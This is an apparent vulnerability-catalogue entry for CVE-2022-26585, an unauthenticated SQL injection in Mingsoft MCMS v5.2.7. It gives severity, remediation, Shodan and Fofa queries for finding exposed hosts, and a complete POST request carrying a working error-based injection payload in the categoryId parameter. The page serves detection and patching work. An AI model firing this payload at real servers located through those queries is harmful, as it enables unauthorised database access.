🔙 목록으로 돌아가기

CVE-2022-26585: Mingsoft MCMS v5.2.7 - SQL Injection

TitleMingsoft MCMS v5.2.7 - SQL Injection
Authorritikchaddha
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary SQL commands through the categoryId parameter in /cms/content/list, potentially extracting sensitive database information, modifying data, or compromising the entire Mingsoft MCMS database.
RemediationUpgrade Mingsoft MCMS to version 5.2.8 or later, which contains patches for this vulnerability.
CVSS Score9.8
EPSS Score0.44893
CVE IDCVE-2022-26585
CWE IDCWE-89
Shodan Queryhttp.favicon.hash:1464851260
Fofa Queryicon_hash="1464851260"
Tags cve cve2022 mingsoft mcms sqli vuln

🔍 Vulnerability Description

Mingsoft MCMS v5.2.7 contains an SQL injection vulnerability via /cms/content/list that allows unauthenticated attackers to execute arbitrary SQL commands on the affected database server.

🌐 HTTP Request

POST /cms/content/list HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

categoryId=2' AND GTID_SUBSET(CONCAT(0x716a717871,md5(4450),0x716a627a71),3762) AND 'EIVI'='EIVI

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-26585.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-26585.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A